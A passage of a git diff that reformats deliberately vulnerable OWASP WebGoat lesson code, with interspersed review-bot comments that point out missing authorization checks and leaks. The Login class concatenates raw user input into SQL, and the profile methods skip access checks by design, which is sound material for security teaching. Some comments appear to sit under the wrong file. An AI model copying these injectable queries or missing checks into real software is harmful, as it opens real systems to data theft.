(SQLException sqle) + + public void createEmployeeProfile(WebSession s, int userId, Employee 
employee) throws UnauthorizedException { - sqle.printStackTrace(); - s.setMessage("Error updating employee profile"); + try + { + // FIXME: Cannot choose the id because we cannot guarantee uniqueness + int nextId = getNextUID(s); + String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)"; + + // System.out.println("Query: " + query); + + try + { + PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query); + + ps.setString(1, employee.getFirstName().toLowerCase()); + ps.setString(2, employee.getLastName()); + ps.setString(3, employee.getSsn()); + ps.setString(4, employee.getTitle()); + ps.setString(5, employee.getPhoneNumber()); + ps.setString(6, employee.getAddress1()); + ps.setString(7, employee.getAddress2()); + ps.setInt(8, employee.getManager()); + ps.setString(9, employee.getStartDate()); + ps.setString(10, employee.getCcn()); + ps.setInt(11, employee.getCcnLimit()); + ps.setString(12, employee.getDisciplinaryActionDate()); + ps.setString(13, employee.getDisciplinaryActionNotes()); + ps.setString(14, employee.getPersonalDescription()); + + ps.execute(); + } catch (SQLException sqle) + { + s.setMessage("Error updating employee profile"); + sqle.printStackTrace(); + } + } catch (Exception e) + { + s.setMessage("Error updating employee profile"); + e.printStackTrace(); + } } - catch (ClassNotFoundException e) - { - // TODO Auto-generated catch block - e.printStackTrace(); - } - return uid + 1; - } - - public void createEmployeeProfile(WebSession s, int userId, - Employee employee) throws UnauthorizedException - { - try - { - // FIXME: Cannot choose the id because we cannot guarantee uniqueness - int nextId = getNextUID(s); - String query = "INSERT INTO employee VALUES ( " + nextId + ", ?,?,?,?,?,?,?,?,?,?,?,?,?,?)"; - - //System.out.println("Query: " + query); - - try - { - PreparedStatement ps = WebSession.getConnection(s).prepareStatement(query); - - ps.setString(1, employee.getFirstName().toLowerCase()); - 
ps.setString(2, employee.getLastName()); - ps.setString(3, employee.getSsn()); - ps.setString(4, employee.getTitle()); - ps.setString(5, employee.getPhoneNumber()); - ps.setString(6, employee.getAddress1()); - ps.setString(7, employee.getAddress2()); - ps.setInt(8, employee.getManager()); - ps.setString(9, employee.getStartDate()); - ps.setString(10, employee.getCcn()); - ps.setInt(11, employee.getCcnLimit()); - ps.setString(12, employee.getDisciplinaryActionDate()); - ps.setString(13, employee.getDisciplinaryActionNotes()); - ps.setString(14, employee.getPersonalDescription()); - - ps.execute(); - } - catch (SQLException sqle) - { - s.setMessage("Error updating employee profile"); - sqle.printStackTrace(); - } - } - catch (Exception e) - { - s.setMessage("Error updating employee profile"); - e.printStackTrace(); - } - } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/ViewProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/ViewProfile.java index 7ad8c8aad..2476a83e0 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/ViewProfile.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/RoleBasedAccessControl/ViewProfile.java @@ -1,9 +1,9 @@ + package org.owasp.webgoat.lessons.RoleBasedAccessControl; import java.sql.ResultSet; import java.sql.SQLException; import java.sql.Statement; - import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction; import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial; import org.owasp.webgoat.session.Employee; 
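Review bot: `changeEmployeeProfile` receives `userId` but never consults it before running the UPDATE against `subjectId`, so any authenticated user can rewrite any employee's record, and the declared `throws UnauthorizedException` has no path that throws it. Since this is the WebGoat RBAC lab, the gap is presumably the intended employee-level flaw (the lesson class rewards a bypass of `isAuthorizedForEmployee`), but the solved variant should open with `if (!isAuthorizedForEmployee(s, userId, subjectId)) throw new UnauthorizedException();`, the same helper `ViewProfile.updateLessonStatus` already calls. In `handleRequest`, the `UnauthorizedException` raised by `chainedAction.handleRequest(s)` is caught, printed as "Internal server error" and dropped, so an authorization failure in the chained action does not stop the flow from continuing to `getNextPage`. `changeEmployeeProfile_BACKUP` is a dead duplicate whose `ps.executeUpdate(query)` passes a SQL string to a `PreparedStatement`, which JDBC drivers reject; it should be removed rather than reformatted. None of the `PreparedStatement`, `Statement` or `ResultSet` objects in this class are closed, so each request leaks a cursor until the connection is discarded.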
@@ -12,219 +12,179 @@ import org.owasp.webgoat.session.UnauthenticatedException; import org.owasp.webgoat.session.UnauthorizedException; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class ViewProfile extends DefaultLessonAction { - public ViewProfile(GoatHillsFinancial lesson, String lessonName, - String actionName) - { - super(lesson, lessonName, actionName); - } - - - public void handleRequest(WebSession s) throws ParameterNotFoundException, - UnauthenticatedException, UnauthorizedException - { - getLesson().setCurrentAction(s, getActionName()); - - if (isAuthenticated(s)) + public ViewProfile(GoatHillsFinancial lesson, String lessonName, String actionName) { - int userId = getIntSessionAttribute(s, getLessonName() + "." - + RoleBasedAccessControl.USER_ID); - int employeeId = -1; - try - { - // User selected employee - employeeId = s.getParser().getIntParameter( - RoleBasedAccessControl.EMPLOYEE_ID); - } - catch (ParameterNotFoundException e) - { - // May be an internally selected employee - employeeId = getIntRequestAttribute(s, getLessonName() + "." - + RoleBasedAccessControl.EMPLOYEE_ID); - } - - Employee employee = getEmployeeProfile(s, userId, employeeId); - setSessionAttribute(s, getLessonName() + "." - + RoleBasedAccessControl.EMPLOYEE_ATTRIBUTE_KEY, employee); + super(lesson, lessonName, actionName); } - else - throw new UnauthenticatedException(); - updateLessonStatus(s); - } - - - private void updateLessonStatus(WebSession s) - { - // If the logged in user is not authorized to see the given employee's data, stage is complete. 
- try + public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException, + UnauthorizedException { - int userId = getIntSessionAttribute(s, getLessonName() + "." - + RoleBasedAccessControl.USER_ID); - int employeeId = s.getParser().getIntParameter( - RoleBasedAccessControl.EMPLOYEE_ID); + getLesson().setCurrentAction(s, getActionName()); - if (RoleBasedAccessControl.STAGE3.equals(getStage(s)) - && !isAuthorizedForEmployee(s, userId, employeeId)) - { - setStageComplete(s, RoleBasedAccessControl.STAGE3); - } - } - catch (ParameterNotFoundException e) - {} - } - - - public String getNextPage(WebSession s) - { - return RoleBasedAccessControl.VIEWPROFILE_ACTION; - } - - - public Employee getEmployeeProfile(WebSession s, int userId, - int subjectUserId) throws UnauthorizedException - { - Employee profile = null; - - // Query the database for the profile data of the given employee - try - { - String query = "SELECT * FROM employee WHERE userid = " - + subjectUserId; - - try - { - Statement answer_statement = WebSession.getConnection(s) - .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - ResultSet answer_results = answer_statement.executeQuery(query); - if (answer_results.next()) + if (isAuthenticated(s)) { - // Note: Do NOT get the password field. 
- profile = new Employee(answer_results.getInt("userid"), - answer_results.getString("first_name"), - answer_results.getString("last_name"), - answer_results.getString("ssn"), answer_results - .getString("title"), answer_results - .getString("phone"), answer_results - .getString("address1"), answer_results - .getString("address2"), answer_results - .getInt("manager"), answer_results - .getString("start_date"), answer_results - .getInt("salary"), answer_results - .getString("ccn"), answer_results - .getInt("ccn_limit"), answer_results - .getString("disciplined_date"), - answer_results.getString("disciplined_notes"), - answer_results.getString("personal_description")); - /* System.out.println("Retrieved employee from db: " + - profile.getFirstName() + " " + profile.getLastName() + - " (" + profile.getId() + ")"); - */} - } - catch (SQLException sqle) - { - s.setMessage("Error getting employee profile"); - sqle.printStackTrace(); - } - } - catch (Exception e) - { - s.setMessage("Error getting employee profile"); - e.printStackTrace(); + int userId = getIntSessionAttribute(s, getLessonName() + "." + RoleBasedAccessControl.USER_ID); + int employeeId = -1; + try + { + // User selected employee + employeeId = s.getParser().getIntParameter(RoleBasedAccessControl.EMPLOYEE_ID); + } catch (ParameterNotFoundException e) + { + // May be an internally selected employee + employeeId = getIntRequestAttribute(s, getLessonName() + "." + RoleBasedAccessControl.EMPLOYEE_ID); + } + + Employee employee = getEmployeeProfile(s, userId, employeeId); + setSessionAttribute(s, getLessonName() + "." 
+ RoleBasedAccessControl.EMPLOYEE_ATTRIBUTE_KEY, employee); + } + else + throw new UnauthenticatedException(); + + updateLessonStatus(s); } - return profile; - } - - - public Employee getEmployeeProfile_BACKUP(WebSession s, int userId, - int subjectUserId) throws UnauthorizedException - { - // Query the database to determine if the given employee is owned by the given user - // Query the database for the profile data of the given employee - - Employee profile = null; - - // Query the database for the profile data of the given employee - try + private void updateLessonStatus(WebSession s) { - String query = "SELECT * FROM employee WHERE userid = " - + subjectUserId; - - try - { - Statement answer_statement = WebSession.getConnection(s) - .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - ResultSet answer_results = answer_statement.executeQuery(query); - if (answer_results.next()) + // If the logged in user is not authorized to see the given employee's data, stage is + // complete. + try { - // Note: Do NOT get the password field. 
- profile = new Employee(answer_results.getInt("userid"), - answer_results.getString("first_name"), - answer_results.getString("last_name"), - answer_results.getString("ssn"), answer_results - .getString("title"), answer_results - .getString("phone"), answer_results - .getString("address1"), answer_results - .getString("address2"), answer_results - .getInt("manager"), answer_results - .getString("start_date"), answer_results - .getInt("salary"), answer_results - .getString("ccn"), answer_results - .getInt("ccn_limit"), answer_results - .getString("disciplined_date"), - answer_results.getString("disciplined_notes"), - answer_results.getString("personal_description")); - /* System.out.println("Retrieved employee from db: " + - profile.getFirstName() + " " + profile.getLastName() + - " (" + profile.getId() + ")"); - */} - } - catch (SQLException sqle) - { - s.setMessage("Error getting employee profile"); - sqle.printStackTrace(); - } - } - catch (Exception e) - { - s.setMessage("Error getting employee profile"); - e.printStackTrace(); + int userId = getIntSessionAttribute(s, getLessonName() + "." 
+ RoleBasedAccessControl.USER_ID); + int employeeId = s.getParser().getIntParameter(RoleBasedAccessControl.EMPLOYEE_ID); + + if (RoleBasedAccessControl.STAGE3.equals(getStage(s)) && !isAuthorizedForEmployee(s, userId, employeeId)) + { + setStageComplete(s, RoleBasedAccessControl.STAGE3); + } + } catch (ParameterNotFoundException e) + { + } } - return profile; - } + public String getNextPage(WebSession s) + { + return RoleBasedAccessControl.VIEWPROFILE_ACTION; + } + + public Employee getEmployeeProfile(WebSession s, int userId, int subjectUserId) throws UnauthorizedException + { + Employee profile = null; + + // Query the database for the profile data of the given employee + try + { + String query = "SELECT * FROM employee WHERE userid = " + subjectUserId; + + try + { + Statement answer_statement = WebSession.getConnection(s) + .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); + ResultSet answer_results = answer_statement.executeQuery(query); + if (answer_results.next()) + { + // Note: Do NOT get the password field. 
+ profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"), + answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results + .getString("title"), answer_results.getString("phone"), answer_results + .getString("address1"), answer_results.getString("address2"), answer_results + .getInt("manager"), answer_results.getString("start_date"), answer_results + .getInt("salary"), answer_results.getString("ccn"), answer_results + .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results + .getString("disciplined_notes"), answer_results.getString("personal_description")); + /* + * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " + + * profile.getLastName() + " (" + profile.getId() + ")"); + */} + } catch (SQLException sqle) + { + s.setMessage("Error getting employee profile"); + sqle.printStackTrace(); + } + } catch (Exception e) + { + s.setMessage("Error getting employee profile"); + e.printStackTrace(); + } + + return profile; + } + + public Employee getEmployeeProfile_BACKUP(WebSession s, int userId, int subjectUserId) throws UnauthorizedException + { + // Query the database to determine if the given employee is owned by the given user + // Query the database for the profile data of the given employee + + Employee profile = null; + + // Query the database for the profile data of the given employee + try + { + String query = "SELECT * FROM employee WHERE userid = " + subjectUserId; + + try + { + Statement answer_statement = WebSession.getConnection(s) + .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); + ResultSet answer_results = answer_statement.executeQuery(query); + if (answer_results.next()) + { + // Note: Do NOT get the password field. 
+ profile = new Employee(answer_results.getInt("userid"), answer_results.getString("first_name"), + answer_results.getString("last_name"), answer_results.getString("ssn"), answer_results + .getString("title"), answer_results.getString("phone"), answer_results + .getString("address1"), answer_results.getString("address2"), answer_results + .getInt("manager"), answer_results.getString("start_date"), answer_results + .getInt("salary"), answer_results.getString("ccn"), answer_results + .getInt("ccn_limit"), answer_results.getString("disciplined_date"), answer_results + .getString("disciplined_notes"), answer_results.getString("personal_description")); + /* + * System.out.println("Retrieved employee from db: " + profile.getFirstName() + " " + + * profile.getLastName() + " (" + profile.getId() + ")"); + */} + } catch (SQLException sqle) + { + s.setMessage("Error getting employee profile"); + sqle.printStackTrace(); + } + } catch (Exception e) + { + s.setMessage("Error getting employee profile"); + e.printStackTrace(); + } + + return profile; + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/ListStaff.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/ListStaff.java index c66b050e1..9a45bb7bd 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/ListStaff.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/ListStaff.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat.lessons.SQLInjection; import java.sql.ResultSet; @@ -5,7 +6,6 @@ import java.sql.SQLException; import java.sql.Statement; import java.util.List; import java.util.Vector; - import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction; import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial; import org.owasp.webgoat.session.EmployeeStub; 
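Review bot: `getEmployeeProfile` executes `SELECT * FROM employee WHERE userid = subjectUserId` without checking that `userId` may view `subjectUserId`; the `throws UnauthorizedException` clause is never exercised, and `updateLessonStatus` treats exactly this bypass as stage-3 completion, so it appears deliberate for the lab, but the solved version should guard with `if (!isAuthorizedForEmployee(s, userId, subjectUserId)) throw new UnauthorizedException();` before the query. The `// Note: Do NOT get the password field.` comment is only half true: `SELECT *` still pulls the password column over the connection, and listing the required columns explicitly would make that intent enforceable. `updateLessonStatus` reads `EMPLOYEE_ID` only as a request parameter and silently returns on `ParameterNotFoundException`, whereas `handleRequest` falls back to the request attribute, so the internally-selected employee path is never evaluated for stage completion. `getEmployeeProfile_BACKUP` duplicates the method verbatim and should be deleted, and both copies leave `answer_statement` unclosed.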
@@ -14,162 +14,143 @@ import org.owasp.webgoat.session.UnauthenticatedException; import org.owasp.webgoat.session.UnauthorizedException; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class ListStaff extends DefaultLessonAction { - public ListStaff(GoatHillsFinancial lesson, String lessonName, String actionName) - { - super(lesson, lessonName, actionName); - } - - - public void handleRequest(WebSession s) throws ParameterNotFoundException, - UnauthenticatedException, UnauthorizedException - { - getLesson().setCurrentAction(s, getActionName()); - - if (isAuthenticated(s)) + public ListStaff(GoatHillsFinancial lesson, String lessonName, String actionName) { - int userId = getIntSessionAttribute(s, getLessonName() + "." - + SQLInjection.USER_ID); - - List employees = getAllEmployees(s, userId); - setSessionAttribute(s, getLessonName() + "." 
- + SQLInjection.STAFF_ATTRIBUTE_KEY, employees); + super(lesson, lessonName, actionName); } - else - throw new UnauthenticatedException(); - } - - public String getNextPage(WebSession s) - { - return SQLInjection.LISTSTAFF_ACTION; - } - - - public List getAllEmployees(WebSession s, int userId) - throws UnauthorizedException - { - // Query the database for all employees "owned" by the given employee - - List employees = new Vector(); - - try + public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException, + UnauthorizedException { - String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles WHERE employee.userid=roles.userid and employee.userid in " - + "(SELECT employee_id FROM ownership WHERE employer_id = " - + userId + ")"; + getLesson().setCurrentAction(s, getActionName()); - try - { - Statement answer_statement = WebSession.getConnection(s) - .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - ResultSet answer_results = answer_statement.executeQuery(query); - answer_results.beforeFirst(); - while (answer_results.next()) + if (isAuthenticated(s)) { - int employeeId = answer_results.getInt("userid"); - String firstName = answer_results.getString("first_name"); - String lastName = answer_results.getString("last_name"); - String role = answer_results.getString("role"); - //System.out.println("Retrieving employee stub for role " + role); - EmployeeStub stub = new EmployeeStub(employeeId, firstName, - lastName, role); - employees.add(stub); + int userId = getIntSessionAttribute(s, getLessonName() + "." + SQLInjection.USER_ID); + + List employees = getAllEmployees(s, userId); + setSessionAttribute(s, getLessonName() + "." 
+ SQLInjection.STAFF_ATTRIBUTE_KEY, employees); } - } - catch (SQLException sqle) - { - s.setMessage("Error getting employees"); - sqle.printStackTrace(); - } - } - catch (Exception e) - { - s.setMessage("Error getting employees"); - e.printStackTrace(); + else + throw new UnauthenticatedException(); } - return employees; - } - - - public List getAllEmployees_BACKUP(WebSession s, int userId) - throws UnauthorizedException - { - // Query the database for all employees "owned" by the given employee - - List employees = new Vector(); - - try + public String getNextPage(WebSession s) { - String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles WHERE employee.userid=roles.userid and employee.userid in " - + "(SELECT employee_id FROM ownership WHERE employer_id = " - + userId + ")"; + return SQLInjection.LISTSTAFF_ACTION; + } - try - { - Statement answer_statement = WebSession.getConnection(s) - .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - ResultSet answer_results = answer_statement.executeQuery(query); - answer_results.beforeFirst(); - while (answer_results.next()) + public List getAllEmployees(WebSession s, int userId) throws UnauthorizedException + { + // Query the database for all employees "owned" by the given employee + + List employees = new Vector(); + + try { - int employeeId = answer_results.getInt("userid"); - String firstName = answer_results.getString("first_name"); - String lastName = answer_results.getString("last_name"); - String role = answer_results.getString("role"); - //System.out.println("Retrieving employee stub for role " + role); - EmployeeStub stub = new EmployeeStub(employeeId, firstName, - lastName, role); - employees.add(stub); + String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles WHERE employee.userid=roles.userid and employee.userid in " + + "(SELECT employee_id FROM ownership WHERE employer_id = " + userId + ")"; + + try + { + Statement 
answer_statement = WebSession.getConnection(s) + .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); + ResultSet answer_results = answer_statement.executeQuery(query); + answer_results.beforeFirst(); + while (answer_results.next()) + { + int employeeId = answer_results.getInt("userid"); + String firstName = answer_results.getString("first_name"); + String lastName = answer_results.getString("last_name"); + String role = answer_results.getString("role"); + // System.out.println("Retrieving employee stub for role " + role); + EmployeeStub stub = new EmployeeStub(employeeId, firstName, lastName, role); + employees.add(stub); + } + } catch (SQLException sqle) + { + s.setMessage("Error getting employees"); + sqle.printStackTrace(); + } + } catch (Exception e) + { + s.setMessage("Error getting employees"); + e.printStackTrace(); } - } - catch (SQLException sqle) - { - s.setMessage("Error getting employees"); - sqle.printStackTrace(); - } - } - catch (Exception e) - { - s.setMessage("Error getting employees"); - e.printStackTrace(); + + return employees; } - return employees; - } + public List getAllEmployees_BACKUP(WebSession s, int userId) throws UnauthorizedException + { + // Query the database for all employees "owned" by the given employee + + List employees = new Vector(); + + try + { + String query = "SELECT employee.userid,first_name,last_name,role FROM employee,roles WHERE employee.userid=roles.userid and employee.userid in " + + "(SELECT employee_id FROM ownership WHERE employer_id = " + userId + ")"; + + try + { + Statement answer_statement = WebSession.getConnection(s) + .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); + ResultSet answer_results = answer_statement.executeQuery(query); + answer_results.beforeFirst(); + while (answer_results.next()) + { + int employeeId = answer_results.getInt("userid"); + String firstName = answer_results.getString("first_name"); + String lastName = 
answer_results.getString("last_name"); + String role = answer_results.getString("role"); + // System.out.println("Retrieving employee stub for role " + role); + EmployeeStub stub = new EmployeeStub(employeeId, firstName, lastName, role); + employees.add(stub); + } + } catch (SQLException sqle) + { + s.setMessage("Error getting employees"); + sqle.printStackTrace(); + } + } catch (Exception e) + { + s.setMessage("Error getting employees"); + e.printStackTrace(); + } + + return employees; + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/Login.java b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/Login.java index 7cdbf5c0b..a6acb8f78 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/Login.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/SQLInjection/Login.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat.lessons.SQLInjection; import java.sql.ResultSet; @@ -5,7 +6,6 @@ import java.sql.SQLException; import java.sql.Statement; import java.util.List; import java.util.Vector; - import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction; import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial; import org.owasp.webgoat.lessons.GoatHillsFinancial.LessonAction; 
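Review bot: The `Statement` and `ResultSet` opened in `getAllEmployees` are never closed on any path, so every request leaves a cursor open on the connection returned by `WebSession.getConnection(s)` until the driver decides to reclaim it. Declare `Statement answer_statement = null;` before the inner `try` and release it afterwards with `finally { if (answer_statement != null) answer_statement.close(); }`, which also closes the `ResultSet`; the `SQLException` that `close()` may throw falls through to the existing outer `catch (Exception e)`. The same leak is repeated verbatim in `getAllEmployees_BACKUP` below, and in `login`, `login_BACKUP` and `getAllEmployees` of the Login.java hunk that follows. Since the commit only reflows these bodies, it is a good moment to fix all of them together rather than per copy.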
@@ -16,282 +16,243 @@ import org.owasp.webgoat.session.UnauthorizedException; import org.owasp.webgoat.session.ValidationException; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class Login extends DefaultLessonAction { - private LessonAction chainedAction; + private LessonAction chainedAction; - - public Login(GoatHillsFinancial lesson, String lessonName, String actionName, - LessonAction chainedAction) - { - super(lesson, lessonName, actionName); - this.chainedAction = chainedAction; - } - - - public void handleRequest(WebSession s) throws ParameterNotFoundException, - ValidationException - { - //System.out.println("Login.handleRequest()"); - getLesson().setCurrentAction(s, getActionName()); - - List employees = getAllEmployees(s); - setSessionAttribute(s, getLessonName() + "." - + SQLInjection.STAFF_ATTRIBUTE_KEY, employees); - - String employeeId = null; - try + public Login(GoatHillsFinancial lesson, String lessonName, String actionName, LessonAction chainedAction) { - employeeId = s.getParser().getStringParameter( - SQLInjection.EMPLOYEE_ID); - String password = s.getParser().getRawParameter( - SQLInjection.PASSWORD); + super(lesson, lessonName, actionName); + this.chainedAction = chainedAction; + } - // Attempt authentication - boolean authenticated = login(s, employeeId, password); + public void handleRequest(WebSession s) throws ParameterNotFoundException, ValidationException + { + // System.out.println("Login.handleRequest()"); + getLesson().setCurrentAction(s, getActionName()); - updateLessonStatus(s); + List employees = getAllEmployees(s); + setSessionAttribute(s, getLessonName() + "." 
+ SQLInjection.STAFF_ATTRIBUTE_KEY, employees); - if (authenticated) - { - // Execute the chained Action if authentication succeeded. + String employeeId = null; try { - chainedAction.handleRequest(s); - } - catch (UnauthenticatedException ue1) + employeeId = s.getParser().getStringParameter(SQLInjection.EMPLOYEE_ID); + String password = s.getParser().getRawParameter(SQLInjection.PASSWORD); + + // Attempt authentication + boolean authenticated = login(s, employeeId, password); + + updateLessonStatus(s); + + if (authenticated) + { + // Execute the chained Action if authentication succeeded. + try + { + chainedAction.handleRequest(s); + } catch (UnauthenticatedException ue1) + { + System.out.println("Internal server error"); + ue1.printStackTrace(); + } catch (UnauthorizedException ue2) + { + System.out.println("Internal server error"); + ue2.printStackTrace(); + } + } + else + s.setMessage("Login failed"); + + } catch (ParameterNotFoundException pnfe) { - System.out.println("Internal server error"); - ue1.printStackTrace(); + // No credentials offered, so we log them out + setSessionAttribute(s, getLessonName() + ".isAuthenticated", Boolean.FALSE); } - catch (UnauthorizedException ue2) + } + + public String getNextPage(WebSession s) + { + String nextPage = SQLInjection.LOGIN_ACTION; + + if (isAuthenticated(s)) nextPage = chainedAction.getNextPage(s); + + return nextPage; + + } + + public boolean requiresAuthentication() + { + return false; + } + + public boolean login(WebSession s, String userId, String password) + { + // System.out.println("Logging in to lesson"); + boolean authenticated = false; + + try { - System.out.println("Internal server error"); - ue2.printStackTrace(); - } - } - else - s.setMessage("Login failed"); - - } - catch (ParameterNotFoundException pnfe) - { - // No credentials offered, so we log them out - setSessionAttribute(s, getLessonName() + ".isAuthenticated", - Boolean.FALSE); - } - } - - - public String getNextPage(WebSession s) - { - 
String nextPage = SQLInjection.LOGIN_ACTION; - - if (isAuthenticated(s)) - nextPage = chainedAction.getNextPage(s); - - return nextPage; - - } - - - public boolean requiresAuthentication() - { - return false; - } - - - public boolean login(WebSession s, String userId, String password) - { - //System.out.println("Logging in to lesson"); - boolean authenticated = false; - - try - { - String query = "SELECT * FROM employee WHERE userid = " + userId - + " and password = '" + password + "'"; - //System.out.println("Query:" + query); - try - { - Statement answer_statement = WebSession.getConnection(s) - .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - ResultSet answer_results = answer_statement.executeQuery(query); - if (answer_results.first()) + String query = "SELECT * FROM employee WHERE userid = " + userId + " and password = '" + password + "'"; + // System.out.println("Query:" + query); + try + { + Statement answer_statement = WebSession.getConnection(s) + .createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY); + ResultSet answer_results = answer_statement.executeQuery(query); + if (answer_results.first()) + { + setSessionAttribute(s, getLessonName() + ".isAuthenticated", Boolean.TRUE); + setSessionAttribute(s, getLessonName() + "." + 